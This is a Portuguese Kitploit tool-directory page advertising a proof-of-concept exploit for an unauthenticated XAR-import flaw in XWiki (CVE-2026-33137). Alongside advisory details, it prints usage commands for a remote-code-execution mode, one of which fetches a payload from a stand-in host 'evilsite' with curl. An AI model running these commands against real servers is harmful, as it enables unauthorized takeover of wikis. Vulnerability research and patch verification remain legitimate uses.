Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-33137 — XWiki Platform - CVE-2026-33137 PoC - Importação XAR não autenticada via REST /wikis/{wikiName} | Kitploit
Ferramentas/GitHubGitHub/portbuster1337/cve-2026-33137
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoRed Teaming
GitHubportbuster1337/cve-2026-33137

CVE-2026-33137

XWiki Platform - CVE-2026-33137 PoC - Importação XAR não autenticada via REST /wikis/{wikiName}

Ver Repositório
44há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-33137

XWiki Platform - Importação de XAR não autenticada via REST /wikis/{wikiName}

Descrição

O endpoint da API REST POST /wikis/{wikiName} no XWiki Platform executa uma importação de XAR (XWiki Archive) sem realizar qualquer verificação de autenticação ou autorização. Um atacante não autenticado pode criar ou atualizar documentos arbitrários na wiki alvo enviando um arquivo XAR manipulado.

  • CVE: CVE-2026-33137
  • CWE: CWE-862 Autorização Ausente (Missing Authorization)
  • CVSS 4.0: 9.3 (Crítico) - AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
  • Publicado: 2026-05-20

Versões Afetadas

StatusVersões
Vulnerável> 15.10.16, > 16.4.6, > 16.10.2
Corrigido16.10.17, 17.4.9, 17.10.3, 18.0.1, 18.1.0-rc-1

Impacto

Um atacante não autenticado pode:

  • Criar páginas wiki arbitrárias com conteúdo arbitrário
  • Sobrescrever páginas wiki existentes
  • Potencialmente obter RCE criando páginas com scripts maliciosos em Velocity/Groovy (se scripting estiver habilitado)

Detalhes

O endpoint REST POST /xwiki/rest/wikis/{wikiName} aceita um arquivo XAR no corpo da requisição e o importa diretamente na wiki sem verificar se o solicitante possui direitos de ADMIN. A correção (commit 4b7b95b) adiciona uma verificação de autorização usando ContextualAuthorizationManager.checkAccess(Right.ADMIN, ...).

Uso do PoC

root@kitploit:~
# Instalar dependências
pip install requests

# Uso básico
python poc.py -t http://target:8080

# Especificar nomes de wiki, espaço e página
python poc.py -t http://target:8080 -w xwiki -s MySpace -p MyPage

# Primeiro, testar o alvo
python poc.py -t http://target:8080 --probe

# Usar um proxy (ex.: Burp Suite)
python poc.py -t http://target:8080 --proxy http://127.0.0.1:8080

# Conteúdo personalizado
python poc.py -t http://target:8080 -c "Proof of Concept"

# Modo RCE: executar um comando no servidor alvo
python poc.py -t http://target:8080 --rce "id"

# RCE com acionamento autenticado (se houver credenciais disponíveis)
python poc.py -t http://target:8080 --rce "curl http://evilsite/payload" -u admin --password pass

Modo RCE (--rce)

A flag --rce importa páginas contendo payloads em Groovy e Velocity que executam a string de comando especificada. Ela automaticamente:

  1. Executa uma verificação pré-voo (detecção de versão, status de vulnerabilidade, teste de endpoint XAR, acessibilidade do caminho de acionamento)
  2. Importa páginas com o comando especificado pelo usuário embutido nas macros {{groovy}} e {{velocity}}
  3. Tenta a renderização via API REST, interface web e injeção estilo SSTI
  4. Relata quais caminhos de acionamento estão acessíveis ou bloqueados

Requisitos para RCE bem-sucedido:

  • O alvo deve permitir visualização de páginas por convidados (ou credenciais fornecidas via -u / --password)
  • Direitos de scripting/programação devem estar habilitados para o usuário visualizador
  • Os caminhos de acionamento não devem estar bloqueados por redirecionamentos de autenticação

Como o Exploit Funciona

  1. Um arquivo XAR (ZIP) mínimo é construído contendo:
    • package.xml - descritor do pacote
    • {Space}/{Page}.xml - XML do documento com conteúdo
  2. Os bytes do XAR são enviados via POST para o endpoint vulnerável
  3. Se vulnerável, o documento é criado sem autenticação
  4. Opcionalmente, verifica lendo novamente os metadados do documento

Aviso Legal

Este PoC é fornecido apenas para fins educacionais e de teste de segurança autorizado. O uso não autorizado deste exploit contra sistemas que você não possui ou para os quais não tem permissão explícita para testar é ilegal. O autor não se responsabiliza por qualquer uso indevido ou danos causados por este software.

Referências

  • GitHub Security Advisory GHSA-qrvh-r3f2-9h4r
  • Commit 4b7b95b (correção)
  • JIRA XWIKI-23953
  • Entrada NVD
Baixar ferramenta